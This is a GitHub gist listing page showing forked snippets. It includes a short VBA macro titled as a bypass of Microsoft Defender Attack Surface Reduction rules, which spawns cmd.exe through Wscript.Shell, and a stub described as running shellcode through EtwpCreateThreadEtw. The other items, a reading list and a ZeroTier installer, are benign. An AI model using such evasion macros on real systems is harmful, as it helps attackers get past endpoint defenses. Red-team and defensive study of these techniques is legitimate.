Goals: Add links that are reasonable and good explanations of how stuff works. No hype and no vendor content if possible. Practical first-hand accounts and experience preferred (super rare at this point).
Jym Cheong jymcheong
jymcheong
/ EtwpTest.cs
Created
August 6, 2021 12:48
— forked from TheWover/EtwpTest.cs
Demonstrates using ntdll.dll!EtwpCreateThreadEtw for local shellcode execution.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace EtwpTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
jymcheong
/ ASR Rules Bypass.vba
Created
November 4, 2021 08:01
— forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |
jymcheong
/ normcore-llm.md
Created
August 30, 2023 06:03
— forked from veekaybee/normcore-llm.md
Normcore LLM Reads
jymcheong
/ InstallZeroTier.ps1
Created
December 31, 2023 10:12
— forked from wise-io/InstallZeroTier.ps1
Installs Latest ZeroTier One Client
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .SYNOPSIS | |
| Installs ZeroTier | |
| .DESCRIPTION | |
| Install ZeroTier and join/configure ZeroTier network | |
| .EXAMPLE | |
| ./ios-InstallZeroTier.ps1 | |
| .NOTES | |
| This script will install PowerShell 7 if it is not present. | |
| A UAC prompt will appear during install if -UI is used. |
OlderNewer